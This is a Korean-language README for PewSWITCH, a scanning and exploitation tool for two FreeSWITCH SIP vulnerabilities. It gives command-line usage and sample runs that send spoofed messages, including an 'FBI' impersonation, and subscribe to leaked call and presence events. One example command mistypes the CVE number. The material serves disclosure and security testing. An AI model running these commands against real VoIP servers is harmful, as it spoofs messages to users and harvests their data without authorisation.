
FreeSWITCH 전용 스캐닝 및 익스플로잇 툴킷 (CVE-2021-37624 및 CVE-2021-41157 대상)
FreeSWITCH 특화 스캐닝 및 익스플로잇 툴킷 (CVE-2021-37624 및 CVE-2021-41157 대상)
관련 블로그: https://0xinfection.github.io/posts/analyzing-freeswitch-vulns/
도구의 도움말은 다음과 같습니다:
$ ./pewswitch --help
___ . ____ _ __ __
/ _ \___|\ __/ __/| __(_) /_____/ /
/ ___/ -_) |/|/ /\ \| |/|/ / / __/ __/ _ \
/_/ \__/|__,__/___/|__,__/_/\__/\__/_//_/ v0.1
"where we pew pew pew freeswitch"
Usage of ./pewswitch:
-cve string
Specify a specific CVE to scan. Both vulns are tested by default.
-delay int
Delay in seconds between subsequent requests. (default 0)
-events string
Comma-separated list of events to be subscribed to. All events are monitored by default.
-expires int
Maximum value of the 'Expires' header for SUBSCRIBE requests. (default 60)
-ext-file string
Specify a file containing extensions instead of '-exts'.
-exts string
Comma separated list of extensions to scan.
-msg-file string
Specify a CSV file containing messages to be sent (if found vulnerable to CVE-2021-37624).
-out-dir string
Output directory to write the results to. (default "./pewswitch-results/")
-out-format string
Output format type of the results. Can be either 'json' or 'csv'. (default "json")
-threads int
Number of threads to use while scanning. (default 2)
-user-agent string
Custom user-agent string to use. (default "pewswitch/0.1")
기본적으로 도구는 두 가지 취약점을 모두 스캔합니다. 특정 취약점만 테스트하려면 -cve 플래그를 사용하세요.
예시:
./pewswitch -cve 'cve-2021-37624' -exts 1000 freeserver.voip.com
확장을 지정하려면 다음 방법 중 하나를 선택할 수 있습니다:
-exts 인자를 통해 쉼표로 구분된 확장 목록을 지정합니다.
예시:
./pewswitch -exts 1000,1001 freeserver.voip.com freeserver1.voip.com:5060
이 명령은 각 확장과 모든 호스트의 조합을 테스트합니다. 따라서 위 명령에서 최종 테스트 대상은 [email protected], [email protected], [email protected]:5060, [email protected]:5060 입니다.
확장이 포함된 파일을 지정합니다. 파일을 사용할 때는 사용자와 호스트를 모두 지정해야 합니다. 이는 특정 서버의 특정 확장을 테스트해야 할 때 특히 유용합니다. 이러한 파일(예: extensions-sample.txt)의 예는 다음과 같습니다:
[email protected]
[email protected]:5060
[email protected]:5660
...
예시:
./pewswitch -ext-file extensions-sample.txt
호스트에 포트가 지정되지 않으면 기본적으로 포트 5060이 대상 포트로 사용됩니다.
도구는 JSON과 CSV 두 가지 형식으로 출력할 수 있습니다. 기본 출력 형식은 JSON입니다. -out-format 스위치를 사용하여 출력 형식을 변경할 수 있습니다.
예시:
./pewswitch -exts 1000 -out-format csv freeserver.voip.com
보고서 샘플은 ./pewswitch-results/ 디렉터리에서 json 및 csv 형식으로 확인할 수 있습니다.
출력 대상 디렉터리는 -out-dir 인자로 변경할 수 있습니다. 기본 출력 디렉터리는 ./pewswitch-results/이며, 도구 실행 시 현재 작업 디렉터리에 생성됩니다.
예시:
./pewswitch -ext-file extensions-sample.txt -out-dir /tmp
취약점 검증/익스플로잇 중 요청을 사용자 정의할 수 있는 추가 패킷별 설정이 있습니다.
서버가 CVE-2021-37624에 취약한 것으로 확인되면, 기본적으로 FBI라는 이름과 022-324-3000 번호의 샘플 메시지가 대상 확장으로 전송됩니다. 메시지 내용은 다음과 같습니다: FBI here. Open your door!
이 동작은 -msg-file 인자를 사용하여 변경할 수 있습니다. 이 인자는 발신자 이름, 전화번호, 그리고 전송할 메시지 내용이 포함된 CSV 파일을 받습니다. 이러한 파일의 예는 messages-sample.csv 입니다.
sender_name,sender_phone,message
FBI,022-324-3000,FBI here. Open your door!
0xInfection,000-000-0000,Hi. Just confirming the vulnerability.
SPAMMY SALESMAN,BAD-GUY-9999,BUY MY STUFF!
예시:
./pewswitch -cve 'cve-2021-27624' -msg-file messages-sample.csv -exts 1000 freeserver.voip.com
기본적으로 도구는 Expires 헤더 값을 60초로 설정하여 SUBSCRIBE 요청을 보냅니다. 이 시간 동안 도구는 서버로부터 NOTIFY 메시지를 계속 수신합니다. 이 값은 -expires 플래그를 사용하여 변경할 수 있습니다.
예시:
./pewswitch -expires 600 -ext-file extensions-sample.txt
도구는 모든 이벤트를 구독하여 NOTIFY 메시지를 모니터링합니다. 모든 이벤트 목록은 다음과 같습니다:
talkholdconferenceas-feature-eventdialogline-seizecall-infoslainclude-session-descriptionpresencepresence.winfomessage-summaryrefer이 동작은 -events 플래그로 변경할 수 있으며, 쉼표로 구분된 모니터링할 이벤트 목록을 받습니다. 예시:
./pewswitch -cve 'cve-2021-41157' -events message-summary,presence -exts 1000,1002 freeserver.voip.com
Releases 섹션에서 미리 빌드된 바이너리를 사용할 수 있습니다. 또는 직접 코드를 컴파일하려면 Go > 1.13이 필요합니다. 도구를 빌드하려면 go build를 실행하면 바이너리가 생성됩니다.
이 도구는 MIT 라이선스로 제공됩니다. 원하는 대로 자유롭게 사용하세요. :)
현재 PewSWITCH는 v0.1입니다.
새로운 요청이나 기능이 있나요? 이슈 또는 풀 리퀘스트를 자유롭게 생성해 주세요.
논의할 내용이 있으면 트위터나 이메일로 제 프로필을 통해 연락해 주세요.
♡로 제작됨 by Pinaki.